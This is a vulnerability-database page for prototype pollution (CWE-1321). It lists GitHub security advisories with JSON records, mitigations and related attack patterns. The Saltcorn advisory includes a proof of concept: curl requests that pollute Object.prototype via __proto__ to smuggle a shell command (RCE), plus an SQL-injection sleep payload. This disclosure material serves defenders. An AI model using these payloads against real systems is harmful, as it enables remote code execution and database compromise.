CWE-1321
AllowedImproperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
Abstraction: Variant · Status: Incomplete
The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.
780 vulnerabilities reference this CWE, most recent first.
GHSA-77XQ-CPVG-7XM2
Vulnerability from github – Published: 2021-05-10 19:07 – Updated: 2023-09-05 22:45This affects the package @tsed/core before 5.65.7. This vulnerability relates to the deepExtend function which is used as part of the utils directory. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@tsed/core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.65.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-7748"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-915"
],
"github_reviewed": true,
"github_reviewed_at": "2021-04-20T17:41:36Z",
"nvd_published_at": "2020-10-20T11:15:00Z",
"severity": "MODERATE"
},
"details": "This affects the package @tsed/core before 5.65.7. This vulnerability relates to the `deepExtend` function which is used as part of the utils directory. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.",
"id": "GHSA-77xq-cpvg-7xm2",
"modified": "2023-09-05T22:45:47Z",
"published": "2021-05-10T19:07:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7748"
},
{
"type": "WEB",
"url": "https://github.com/TypedProject/tsed/commit/1395773ddac35926cf058fc6da9fb8e82266761b"
},
{
"type": "WEB",
"url": "https://github.com/TypedProject/tsed/blob/production/packages/core/src/utils/deepExtends.ts%23L36"
},
{
"type": "PACKAGE",
"url": "https://github.com/tsedio/tsed"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-TSEDCORE-1019382"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "Prototype pollution in @tsed/core"
}
GHSA-78P3-FWCQ-62C2
Vulnerability from github – Published: 2024-10-03 19:50 – Updated: 2024-10-03 19:50Summary
The endpoint /site-structure/localizer/save-string/:lang/:defstring accepts two parameter values: lang and defstring. These values are used in an unsafe way to set the keys and value of the cfgStrings object. It allows to add/modify properties of the Object prototype that result in several logic issues, including:
- RCE vulnerabilities by polluting the tempRootFolder property
- SQL injection vulnerabilities by polluting the schema property when using PostgreSQL database.
Details
- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/infoarch.js#L236-L239
router.post(
"/localizer/save-string/:lang/:defstring",
isAdmin,
error_catcher(async (req, res) => {
const { lang, defstring } = req.params; // source
const cfgStrings = getState().getConfigCopy("localizer_strings");
if (cfgStrings[lang]) cfgStrings[lang][defstring] = text(req.body.value); // [1] sink
else cfgStrings[lang] = { [defstring]: text(req.body.value) };
await getState().setConfig("localizer_strings", cfgStrings);
res.redirect(`/site-structure/localizer/edit/${lang}`);
})
);
PoC
Setup:
- set SALTCORN_NWORKERS=1 before starting the saltcorn server (to easily observe the behavior of the PoC)
SALTCORN_NWORKERS=1 saltcorn serve
- make sure to use PostgresSQL backend
- login with a user with admin permission
RCE
This PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain command executed. - check that the file that will be created does not exists:
cat /tmp/RCE
cat: /tmp/RCE: No such file or directory
- pollute the
Object.prototypewith atempRootFoldervalue set to;echo+"rce"|tee+/tmp/RCE;by sending the following request *** :
curl -i -X $'POST' \
-H $'Host: localhost:3000' \
-H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' \
-H $'Origin: http://localhost:3000' \
-H $'Connection: close' \
-b $'loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE' \
--data-binary $'_csrf=VALID_csrf_Value&value=;echo+"rce"|tee+/tmp/RCE;' \
$'http://localhost:3000/site-structure/localizer/save-string/__proto__/tempRootFolder'
visit http://localhost:3000/plugins/new
- enter the following fields:
- Name: test
- Source: git
- other fields blank
- click Create
- you will get an error but the command echo "rce" | tee /tmp/RCE will be executed
- to verify:
cat /tmp/RCE
rce
The RCE occurs because after the previous curl request, the tempRootFolder property is set to ;echo+"rce"|tee+/tmp/RCE; that is later used to build the shell commands.
- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L45-L58
class PluginInstaller {
constructor(plugin, opts = {}) { // opts will have the tempRootFolder property set with dangerous values // [2]
[...]
this.tempRootFolder =
opts.tempRootFolder || envPaths("saltcorn", { suffix: "tmp" }).temp; // [3]
[...]
this.pckJsonPath = join(this.pluginDir, "package.json");
this.tempDir = join(this.tempRootFolder, "temp_install", ...tokens); // [4]
[...]
}
[...]
}
SQL Injection
This PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain SQL queries (i.e SQLi).
- visit http://localhost:3000/table to check the page returns some results (no errors)
- pollute the Object.prototype with a schema value set to " (just to create an exception in the query that will be executed to demonstrate the issue) by sending the following request *** :
curl -i -X $'POST' \
-H $'Host: localhost:3000' \
-H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' \
-H $'Origin: http://localhost:3000' \
-H $'Connection: close' \
-b $'loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE' \
--data-binary $'_csrf=VALID_csrf_Value&value=\"' \
$'http://localhost:3000/site-structure/localizer/save-string/__proto__/schema'
- visit again
http://localhost:3000/tablebut this time an SQL error will appear:
syntax error at or near "" order by lower(""
NOTE: Another payload to use as value could be pg_user"+WHERE+1=1+AND+(SELECT+pg_sleep(5))+IS+NOT+NULL+--
The SQL injection occurs because after the previous curl request, the schema property is set to ".
- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/postgres/postgres.js#L101
const select = async (tbl, whereObj, selectopts = {}) => { // [2] selectopts
const { where, values } = mkWhere(whereObj);
const schema = selectopts.schema || getTenantSchema(); // [3] selectopts.schema
const sql = `SELECT ${
selectopts.fields ? selectopts.fields.join(", ") : `*`
} FROM "${schema}"."${sqlsanitize(tbl)}" ${where} ${mkSelectOptions( // [4] schema
selectopts,
values,
false
)}`;
sql_log(sql, values);
const tq = await (client || selectopts.client || pool).query(sql, values);
return tq.rows;
};
*** Retrieve valid values for the connect.sid (VALID_CONNECT_SID_COOKIE) and _csrf values (VALID_csrf_Value) :
- open the browser developer console and go to the Network tab
- visit http://localhost:3000/site-structure/localizer/add-lang
- add a language (Name: test , Locale: test) and click Save
- under the Network tab, filter for save-lang and check the request parameters (Headers and Payload/Request tabs)
- copy the values for connect.sid and _csrf and paste in the curl command above
Impact
Remote code execution (RCE), Sql injection and business logic errors.
Recommended Mitigation
Check the values of lang and defstring parameters against dangerous properties like __proto__, constructor, prototype.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.0.0-beta.13"
},
"package": {
"ecosystem": "npm",
"name": "@saltcorn/server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.0-beta.14"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2024-10-03T19:50:59Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nThe endpoint `/site-structure/localizer/save-string/:lang/:defstring` accepts two parameter values: `lang` and `defstring`. These values are used in an unsafe way to set the keys and value of the `cfgStrings` object. It allows to add/modify properties of the `Object prototype` that result in several logic issues, including:\n- RCE vulnerabilities by polluting the `tempRootFolder` property \n- SQL injection vulnerabilities by polluting the `schema` property when using `PostgreSQL` database.\n\n\n### Details\n\n- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/infoarch.js#L236-L239\n```js\nrouter.post(\n \"/localizer/save-string/:lang/:defstring\",\n isAdmin,\n error_catcher(async (req, res) =\u003e {\n const { lang, defstring } = req.params; // source\n\n const cfgStrings = getState().getConfigCopy(\"localizer_strings\");\n if (cfgStrings[lang]) cfgStrings[lang][defstring] = text(req.body.value); // [1] sink\n else cfgStrings[lang] = { [defstring]: text(req.body.value) };\n await getState().setConfig(\"localizer_strings\", cfgStrings);\n res.redirect(`/site-structure/localizer/edit/${lang}`);\n })\n);\n```\n\n### PoC\n\nSetup:\n- set `SALTCORN_NWORKERS=1` before starting the `saltcorn` server (to easily observe the behavior of the PoC)\n```\nSALTCORN_NWORKERS=1 saltcorn serve\n```\n- make sure to use PostgresSQL backend\n- login with a user with admin permission\n\n#### RCE\n\nThis PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain command executed.\n- check that the file that will be created does not exists:\n```\ncat /tmp/RCE\ncat: /tmp/RCE: No such file or directory\n```\n\n- pollute the `Object.prototype` with a `tempRootFolder` value set to `;echo+\"rce\"|tee+/tmp/RCE;` by sending the following request *** :\n\n```bash\ncurl -i -X $\u0027POST\u0027 \\\n -H $\u0027Host: localhost:3000\u0027 \\\n -H $\u0027Content-Type: application/x-www-form-urlencoded; charset=UTF-8\u0027 -H $\u0027Accept: */*\u0027 \\\n -H $\u0027Origin: http://localhost:3000\u0027 \\\n -H $\u0027Connection: close\u0027 \\\n -b $\u0027loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE\u0027 \\\n --data-binary $\u0027_csrf=VALID_csrf_Value\u0026value=;echo+\"rce\"|tee+/tmp/RCE;\u0027 \\\n $\u0027http://localhost:3000/site-structure/localizer/save-string/__proto__/tempRootFolder\u0027\n```\n\n visit `http://localhost:3000/plugins/new`\n- enter the following fields:\n\t- Name: `test`\n\t- Source: `git`\n\t- other fields blank\n - click `Create`\n- you will get an error but the command `echo \"rce\" | tee /tmp/RCE` will be executed\n- to verify:\n```\ncat /tmp/RCE\nrce\n```\n\nThe RCE occurs because after the previous curl request, the `tempRootFolder` property is set to `;echo+\"rce\"|tee+/tmp/RCE;` that is later used to build the shell commands.\n\n- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L45-L58\n\n```js\nclass PluginInstaller {\n constructor(plugin, opts = {}) { // opts will have the tempRootFolder property set with dangerous values // [2]\n [...]\n this.tempRootFolder =\n opts.tempRootFolder || envPaths(\"saltcorn\", { suffix: \"tmp\" }).temp; // [3]\n\t [...]\n this.pckJsonPath = join(this.pluginDir, \"package.json\");\n this.tempDir = join(this.tempRootFolder, \"temp_install\", ...tokens); // [4]\n [...]\n }\n [...]\n}\n```\n\n#### SQL Injection\n\nThis PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain SQL queries (i.e SQLi).\n- visit `http://localhost:3000/table` to check the page returns some results (no errors)\n- pollute the `Object.prototype` with a schema value set to `\"` (just to create an exception in the query that will be executed to demonstrate the issue) by sending the following request *** :\n\n```\ncurl -i -X $\u0027POST\u0027 \\\n -H $\u0027Host: localhost:3000\u0027 \\\n -H $\u0027Content-Type: application/x-www-form-urlencoded; charset=UTF-8\u0027 -H $\u0027Accept: */*\u0027 \\\n -H $\u0027Origin: http://localhost:3000\u0027 \\\n -H $\u0027Connection: close\u0027 \\\n -b $\u0027loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE\u0027 \\\n --data-binary $\u0027_csrf=VALID_csrf_Value\u0026value=\\\"\u0027 \\\n $\u0027http://localhost:3000/site-structure/localizer/save-string/__proto__/schema\u0027\n```\n\n- visit again `http://localhost:3000/table` but this time an SQL error will appear:\n```\nsyntax error at or near \"\" order by lower(\"\"\n```\n\n\n**NOTE**: Another payload to use as `value` could be `pg_user\"+WHERE+1=1+AND+(SELECT+pg_sleep(5))+IS+NOT+NULL+--`\n\nThe SQL injection occurs because after the previous curl request, the `schema` property is set to `\"`.\n- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/postgres/postgres.js#L101\n\n```js\nconst select = async (tbl, whereObj, selectopts = {}) =\u003e { // [2] selectopts\n const { where, values } = mkWhere(whereObj);\n const schema = selectopts.schema || getTenantSchema(); // [3] selectopts.schema\n const sql = `SELECT ${\n selectopts.fields ? selectopts.fields.join(\", \") : `*`\n } FROM \"${schema}\".\"${sqlsanitize(tbl)}\" ${where} ${mkSelectOptions( // [4] schema\n selectopts,\n values,\n false\n )}`;\n sql_log(sql, values);\n const tq = await (client || selectopts.client || pool).query(sql, values);\n\n return tq.rows;\n};\n```\n\n*** Retrieve valid values for the `connect.sid` (`VALID_CONNECT_SID_COOKIE`) and `_csrf` values (`VALID_csrf_Value`) :\n- open the browser developer console and go to the `Network` tab\n- visit `http://localhost:3000/site-structure/localizer/add-lang`\n- add a language (`Name: test` , `Locale: test`) and click `Save`\n- under the `Network` tab, filter for `save-lang` and check the request parameters (`Headers` and `Payload`/`Request` tabs)\n- copy the values for `connect.sid` and `_csrf` and paste in the curl command above\n\n### Impact\n\nRemote code execution (RCE), Sql injection and business logic errors.\n\n### Recommended Mitigation\n\nCheck the values of `lang` and `defstring` parameters against dangerous properties like `__proto__`, `constructor`, `prototype`.",
"id": "GHSA-78p3-fwcq-62c2",
"modified": "2024-10-03T19:50:59Z",
"published": "2024-10-03T19:50:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/saltcorn/saltcorn/security/advisories/GHSA-78p3-fwcq-62c2"
},
{
"type": "WEB",
"url": "https://github.com/saltcorn/saltcorn/commit/9e066ae8ba317469053cc27e95dcdf5b6e60e12d"
},
{
"type": "PACKAGE",
"url": "https://github.com/saltcorn/saltcorn"
},
{
"type": "WEB",
"url": "https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/infoarch.js#L236-L239"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "@saltcorn/server Remote Code Execution (RCE) / SQL injection via prototype pollution by manipulating `lang` and `defstring` parameters when setting localizer strings"
}
GHSA-798J-M949-2J7C
Vulnerability from github – Published: 2025-03-28 21:30 – Updated: 2025-04-01 21:30A Prototype Pollution issue in Aliconnect /sdk v.0.0.6 allows an attacker to execute arbitrary code via the aim function in the aim.js component.
{
"affected": [],
"aliases": [
"CVE-2024-24292"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-28T21:15:15Z",
"severity": "CRITICAL"
},
"details": "A Prototype Pollution issue in Aliconnect /sdk v.0.0.6 allows an attacker to execute arbitrary code via the aim function in the aim.js component.",
"id": "GHSA-798j-m949-2j7c",
"modified": "2025-04-01T21:30:46Z",
"published": "2025-03-28T21:30:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24292"
},
{
"type": "WEB",
"url": "https://gist.github.com/tariqhawis/a8b2c936622c885558173c37df0a77d9"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-799Q-F2PX-WX8C
Vulnerability from github – Published: 2025-03-28 21:30 – Updated: 2025-04-01 14:32Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-q8jq-4rm5-4hm5. This link is maintained to preserve external references.
Original Description
alizeait unflatto <= 1.0.2 was discovered to contain a prototype pollution via the method exports.unflatto at /dist/index.js. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@alizeait/unflatto"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-31T15:57:15Z",
"nvd_published_at": "2025-03-28T21:15:16Z",
"severity": "HIGH"
},
"details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-q8jq-4rm5-4hm5. This link is maintained to preserve external references.\n\n## Original Description\nalizeait unflatto \u003c= 1.0.2 was discovered to contain a prototype pollution via the method exports.unflatto at /dist/index.js. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.",
"id": "GHSA-799q-f2px-wx8c",
"modified": "2025-04-01T14:32:14Z",
"published": "2025-03-28T21:30:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38988"
},
{
"type": "WEB",
"url": "https://github.com/alizeait/unflatto/issues/32"
},
{
"type": "WEB",
"url": "https://gist.github.com/mestrtee/4c5dfb66bea377889c44dd6c8af28713"
},
{
"type": "PACKAGE",
"url": "https://github.com/alizeait/unflatto"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Duplicate Advisory: @alizeait/unflatto Prototype Pollution via `exports.unflatto` Method",
"withdrawn": "2025-04-01T14:32:14Z"
}
GHSA-79H2-V6HH-WQ23
Vulnerability from github – Published: 2025-02-06 06:31 – Updated: 2025-02-06 22:52A prototype pollution in the lib.deep function of @ndhoule/defaults v2.0.1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@ndhoule/defaults"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-57066"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2025-02-06T22:52:18Z",
"nvd_published_at": "2025-02-05T22:15:31Z",
"severity": "HIGH"
},
"details": "A prototype pollution in the lib.deep function of @ndhoule/defaults v2.0.1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.",
"id": "GHSA-79h2-v6hh-wq23",
"modified": "2025-02-06T22:52:18Z",
"published": "2025-02-06T06:31:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-57066"
},
{
"type": "WEB",
"url": "https://gist.github.com/tariqhawis/8ee7327cc8b78df738cd32505cbbbd44"
},
{
"type": "PACKAGE",
"url": "https://github.com/ndhoule/defaults"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "@ndhoule/defaults prototype pollution"
}
GHSA-79XF-67R4-Q2JJ
Vulnerability from github – Published: 2023-04-11 06:30 – Updated: 2023-04-19 17:10All versions of the package safe-eval are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation. Exploiting this vulnerability might result in remote code execution (RCE).
Vulnerable functions:
defineGetter, stack(), toLocaleString(), propertyIsEnumerable.call(), valueOf().
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "safe-eval"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.4.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-26122"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2023-04-11T15:27:27Z",
"nvd_published_at": "2023-04-11T05:15:00Z",
"severity": "CRITICAL"
},
"details": "All versions of the package safe-eval are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation. Exploiting this vulnerability might result in remote code execution (RCE).\n\n**Vulnerable functions:**\n\n__defineGetter__, stack(), toLocaleString(), propertyIsEnumerable.call(), valueOf().",
"id": "GHSA-79xf-67r4-q2jj",
"modified": "2023-04-19T17:10:20Z",
"published": "2023-04-11T06:30:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26122"
},
{
"type": "WEB",
"url": "https://github.com/hacksparrow/safe-eval/issues/27"
},
{
"type": "WEB",
"url": "https://github.com/hacksparrow/safe-eval/issues/31"
},
{
"type": "WEB",
"url": "https://github.com/hacksparrow/safe-eval/issues/32"
},
{
"type": "WEB",
"url": "https://github.com/hacksparrow/safe-eval/issues/33"
},
{
"type": "WEB",
"url": "https://github.com/hacksparrow/safe-eval/issues/34"
},
{
"type": "WEB",
"url": "https://github.com/hacksparrow/safe-eval/issues/35"
},
{
"type": "WEB",
"url": "https://gist.github.com/seongil-wi/2db6cb884e10137a93132b7f74879cce"
},
{
"type": "PACKAGE",
"url": "https://github.com/hacksparrow/safe-eval"
},
{
"type": "WEB",
"url": "https://security.snyk.io/vuln/SNYK-JS-SAFEEVAL-3373064"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "safe-eval vulnerable to Sandbox Bypass due to improper input sanitization"
}
GHSA-7FGX-PMW9-49H5
Vulnerability from github – Published: 2024-08-13 12:30 – Updated: 2024-08-13 12:30A flaw allowing arbitrary code execution was discovered in Kibana. An attacker with access to ML and Alerting connector features, as well as write access to internal ML indices can trigger a prototype pollution vulnerability, ultimately leading to arbitrary code execution.
{
"affected": [],
"aliases": [
"CVE-2024-37287"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-13T12:15:06Z",
"severity": "CRITICAL"
},
"details": "A flaw allowing arbitrary code execution was discovered in Kibana. An attacker with access to ML and Alerting connector features, as well as write access to internal ML indices can trigger a prototype pollution vulnerability, ultimately leading to arbitrary code execution.",
"id": "GHSA-7fgx-pmw9-49h5",
"modified": "2024-08-13T12:30:53Z",
"published": "2024-08-13T12:30:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37287"
},
{
"type": "WEB",
"url": "https://discuss.elastic.co/t/kibana-8-14-2-7-17-23-security-update-esa-2024-22"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-7H43-GX24-P529
Vulnerability from github – Published: 2021-05-10 19:17 – Updated: 2021-04-19 22:36This affects the package json8 before 1.0.3. The function adds in the target object the property specified in the path, however it does not properly check the key being set, leading to a prototype pollution.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "json8"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-7770"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2021-04-19T22:36:51Z",
"nvd_published_at": "2020-11-12T11:15:00Z",
"severity": "CRITICAL"
},
"details": "This affects the package json8 before 1.0.3. The function adds in the target object the property specified in the path, however it does not properly check the key being set, leading to a prototype pollution.",
"id": "GHSA-7h43-gx24-p529",
"modified": "2021-04-19T22:36:51Z",
"published": "2021-05-10T19:17:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7770"
},
{
"type": "WEB",
"url": "https://github.com/sonnyp/JSON8/commit/2e890261b66cbc54ae01d0c79c71b0fd18379e7e"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-JSON8-1017116"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/package/json8"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype pollution in json8"
}
GHSA-7MG4-W3W5-X5PC
Vulnerability from github – Published: 2021-05-10 18:37 – Updated: 2025-03-05 19:04This affects the package json-pointer before 0.6.1. Multiple reference of object using slash is supported.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "json-pointer"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.6.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.webjars.npm:json-pointer"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.6.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-7709"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2021-04-21T21:10:19Z",
"nvd_published_at": "2020-10-05T08:15:00Z",
"severity": "MODERATE"
},
"details": "This affects the package json-pointer before 0.6.1. Multiple reference of object using slash is supported.",
"id": "GHSA-7mg4-w3w5-x5pc",
"modified": "2025-03-05T19:04:37Z",
"published": "2021-05-10T18:37:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7709"
},
{
"type": "WEB",
"url": "https://github.com/manuelstofer/json-pointer/pull/34"
},
{
"type": "WEB",
"url": "https://github.com/manuelstofer/json-pointer/pull/34/files"
},
{
"type": "PACKAGE",
"url": "https://github.com/manuelstofer/json-pointer"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-598862"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-JSONPOINTER-596925"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/package/json-pointer"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype pollution in json-pointer"
}
GHSA-7PPQ-3WW2-75F4
Vulnerability from github – Published: 2024-07-24 21:31 – Updated: 2024-07-24 21:31A vulnerability in the web-based management interface of HPE Aruba Networking EdgeConnect SD-WAN gateway could allow an authenticated remote attacker to conduct a server-side prototype pollution attack. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the underlying operating system leading to complete system compromise.
{
"affected": [],
"aliases": [
"CVE-2024-33519"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-24T20:15:03Z",
"severity": "HIGH"
},
"details": "A vulnerability in the web-based management interface of HPE Aruba Networking EdgeConnect SD-WAN gateway could allow an authenticated remote attacker to conduct a server-side prototype pollution attack. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the underlying operating system leading to complete system compromise.",
"id": "GHSA-7ppq-3ww2-75f4",
"modified": "2024-07-24T21:31:30Z",
"published": "2024-07-24T21:31:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-33519"
},
{
"type": "WEB",
"url": "https://csaf.arubanetworks.com/2024/hpe_aruba_networking_-_hpesbnw04673.txt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.
Mitigation
By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.
Mitigation
Strategy: Input Validation
When handling untrusted objects, validating using a schema can be used.
Mitigation
By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.
Mitigation
Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.
CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs
In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.
CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels
An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.